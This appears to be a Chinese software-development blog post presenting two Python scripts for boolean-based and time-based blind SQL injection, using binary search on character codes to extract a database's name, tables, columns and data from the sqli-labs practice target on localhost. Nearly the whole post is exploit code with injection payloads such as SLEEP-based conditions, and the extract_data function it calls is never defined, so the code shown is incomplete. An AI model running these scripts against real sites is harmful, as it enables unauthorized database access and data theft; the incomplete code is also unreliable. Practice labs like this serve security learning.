主页 > 软件开发  > 

利用二分法+布尔盲注、时间盲注进行sql注入

利用二分法+布尔盲注、时间盲注进行sql注入
一、布尔盲注: import requests def binary_search_character(url, query, index, low=32, high=127): while low < high: mid = (low + high + 1) // 2 payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- " res = {"id": payload} r = requests.get(url, params=res) if "You are in.........." in r.text: low = mid else: high = mid - 1 return chr(low) if low > 32 else '' if __name__ == '__main__': url = 'http://127.0.0.1/sqlilabs/Less-8/index.php' database_name = extract_data(url, "SELECT database()") print(f"数据库名: {database_name}") table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'" table_names = extract_data(url, table_name_query) print(f"表名: {table_names}") table_name = table_names.split(',')[0] column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'" column_names = extract_data(url, column_name_query) print(f"列名: {column_names}") column_name = column_names.split(',')[1] data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}" extracted_values = extract_data(url, data_query) print(f"数据: {extracted_values}") print(f"数据库名: {database_name}") print(f"表名: {table_names}") print(f"列名: {column_names}") print(f"数据: {extracted_values}") 二、时间盲注: import requests import time def binary_search_character(url, query, index, low=32, high=127): while low < high: mid = (low + high + 1) // 2 payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- " res = {"id": payload} start_time = time.time() r = requests.get(url, params=res) response_time = time.time() - start_time if response_time > 1.5: # 服务器延迟意味着条件成立 low = mid else: high = mid - 1 return chr(low) if low > 32 else '' if __name__ == '__main__': url = 'http://127.0.0.1/sqlilabs/Less-8/index.php' database_name = extract_data(url, "SELECT database()") print(f"数据库名: {database_name}") table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'" table_names = extract_data(url, table_name_query) print(f"表名: {table_names}") table_name = table_names.split(',')[0] column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'" column_names = extract_data(url, column_name_query) print(f"列名: {column_names}") column_name = column_names.split(',')[1] data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}" extracted_values = extract_data(url, data_query) print(f"数据: {extracted_values}")

标签:

利用二分法+布尔盲注、时间盲注进行sql注入由讯客互联软件开发栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“利用二分法+布尔盲注、时间盲注进行sql注入

上一篇
基于HAL库的按钮实验

下一篇
动态多线程算法概述

推荐文章